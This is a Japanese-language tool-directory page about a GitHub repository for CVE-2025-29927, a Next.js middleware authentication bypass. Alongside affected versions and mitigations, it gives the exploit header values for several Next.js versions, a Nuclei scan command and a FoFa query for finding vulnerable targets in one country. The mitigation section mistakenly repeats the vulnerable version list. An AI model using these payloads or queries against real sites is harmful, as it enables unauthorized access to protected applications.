Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927 — CVE-2025-29927: Next.js ミドルウェアバイパスの脆弱性 | Kitploit
ツール/GitHubGitHub/kh4sh3i/cve-2025-29927
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Next.js ミドルウェアバイパスの脆弱性

リポジトリを見る
241年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有



CVE-2025-29927

CVE-2025-29927: Next.js ミドルウェアバイパスの脆弱性 このリポジトリは、Next.js における CVE-2025-29927 脆弱性を示しています。この脆弱性では、内部ヘッダー x-middleware-subrequest を使用して、認証などのミドルウェアチェックをバイパスできます。

影響を受けるバージョン

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

緩和策と修正

  • Next.js を修正済みバージョンにアップグレードしてください:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • アップグレードがすぐに不可能な場合は、ウェブサーバーまたはプロキシレベルで x-middleware-subrequest ヘッダーをブロックまたは削除してください:

影響シナリオ

  • 認証バイパス: 攻撃者は適切な認証や認可なしに保護されたルートにアクセスできます。
  • コンテンツセキュリティポリシー (CSP) バイパス: CSP ヘッダーがミドルウェア経由で追加されている場合、攻撃者はこれらのセキュリティ制御をバイパスし、クロスサイトスクリプティング (XSS) 攻撃を可能にする可能性があります。
  • キャッシュポイズニングによるサービス拒否: 特定の構成では、攻撃者はキャッシュ制御ヘッダーを設定するミドルウェアをバイパスすることで、不正なコンテンツでキャッシュを汚染する可能性があります。

Next.js CVE-2025-29927 Nuclei テンプレートの使用

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

異なる Next.js バージョンにわたる悪用

  • 12.2 より前のバージョンの場合:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • 12.2 以降のバージョンの場合:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • 13.2.0 以降のバージョンの場合:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

FoFa を使用したターゲットのハンティング

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

この脆弱性のための無料のCTF

  • CTF
ツールをダウンロード